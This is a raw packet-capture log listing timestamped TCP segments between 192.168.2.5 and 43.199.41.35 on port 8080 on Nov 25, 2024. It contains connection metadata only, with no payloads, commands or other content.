                                                                                                                                                        Nov 25, 2024 11:10:19.139086008 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.139786959 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.139889956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.139945030 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.140675068 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.140794039 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.140839100 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.141546011 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.141648054 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.141690969 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.142424107 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.142534971 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.142594099 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.143321991 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.143441916 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.143490076 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.144299030 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.144402027 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.144454002 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.145092010 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.145235062 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.145422935 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.146020889 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.146137953 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.146214962 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.146883965 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.147036076 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.147109032 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.147753954 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.147855043 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.147911072 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.148658991 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.148777962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.148881912 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.149542093 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.149637938 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.149715900 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.150413990 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.198370934 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.254544020 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.254695892 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.254779100 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.255032063 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.255151033 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.255250931 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.255892992 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.255979061 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.256079912 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.256742001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.256854057 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.256894112 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.257646084 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.257711887 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.257793903 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.258506060 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.258656979 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.258709908 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.259435892 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.259448051 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.259502888 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.283454895 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.283545017 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.283601999 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.283807993 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.283988953 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.284033060 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.284077883 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.284943104 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.284993887 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.285007954 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.285742998 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.285810947 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.285845041 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.286685944 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.286763906 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.286793947 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.287533045 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.287610054 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.287652016 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.288449049 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.288501024 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.288628101 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.289314032 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.289346933 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.289412022 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.290213108 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.290282011 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.290321112 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.291085005 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.291161060 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.291172981 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.311361074 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.311427116 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.311470985 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.311671019 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.311722040 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.311773062 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.312443972 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.312517881 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.312583923 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.313349009 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.313385963 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.313445091 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.314202070 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.314241886 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.314281940 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.315025091 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.315083981 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.315140963 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.315949917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.316004038 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.316045046 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.316817999 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.316855907 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.316926956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.317689896 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.317787886 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.317898989 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.318581104 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.318682909 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.318751097 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.319480896 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.319538116 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.319576025 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.320354939 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.320420027 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.320456982 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.321250916 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.321295023 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.321362972 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.322161913 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.322205067 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.322221994 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.323019028 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.323060989 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.323136091 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.323904991 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.324013948 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.324018002 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.324780941 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.324836969 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.324878931 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.325778008 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.325845003 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.325845957 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.326544046 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.326615095 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.326656103 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.327446938 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.327507019 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.327577114 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.328327894 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.328402996 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.328432083 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.329278946 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.329338074 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.329366922 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.330159903 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.330226898 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.330321074 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.331094027 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.331156015 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.331294060 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.331938982 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.332014084 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.332043886 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.332757950 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.332849979 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.332879066 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.333650112 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.333681107 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.333796978 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.334533930 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.334600925 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.334659100 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.335561991 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.335613966 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.335680008 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.336527109 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.336585045 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.336595058 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.337565899 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.337611914 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.337641001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.338282108 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.338351965 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.338396072 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.339131117 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.339175940 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.339221001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.339838982 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.339884043 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.339950085 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.340768099 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.340811014 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.340899944 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.341633081 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.341681957 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.341722965 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.342555046 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.342603922 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.343054056 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.446645975 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.446718931 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.446810007 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.446970940 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.447163105 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.447211981 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.447253942 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.448081017 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.448118925 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.448179007 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.448976994 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.448993921 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.449026108 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.449847937 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.449906111 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.449932098 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.450726986 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.450782061 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.450839043 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.451618910 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.451675892 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.475868940 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.475970984 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.476012945 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.476257086 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.476377010 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.476423979 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.477144957 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.477261066 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.477305889 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.478066921 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.478092909 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.478168011 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.478954077 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.479043007 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.479095936 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.479773998 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.479882956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.479965925 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.480669022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.480779886 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.480865002 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.481559038 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.481703997 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.481753111 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.482454062 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.482671022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.482707977 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.483354092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.483536005 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.483594894 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.503259897 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.503359079 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.503421068 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.503676891 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.503827095 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.503875971 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.504556894 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.504667044 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.504765987 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.505513906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.505702972 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.505759001 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.505832911 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.506577015 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.506623983 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.506674051 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.507518053 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.507586002 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.507642031 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.508397102 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.508445978 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.508476973 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.509262085 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.509330988 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.509335041 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.510128021 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.510185957 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.510248899 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.511025906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.511070013 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.511141062 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.511936903 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.511980057 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.512083054 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.512849092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.512917995 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.512940884 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.513686895 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.513744116 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.513806105 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.514621973 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.514678001 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.514724970 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.515476942 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.515527964 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.515559912 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.516355038 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:19.516391993 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:19.516457081 CET80804970543.199.41.35192.168.2.5
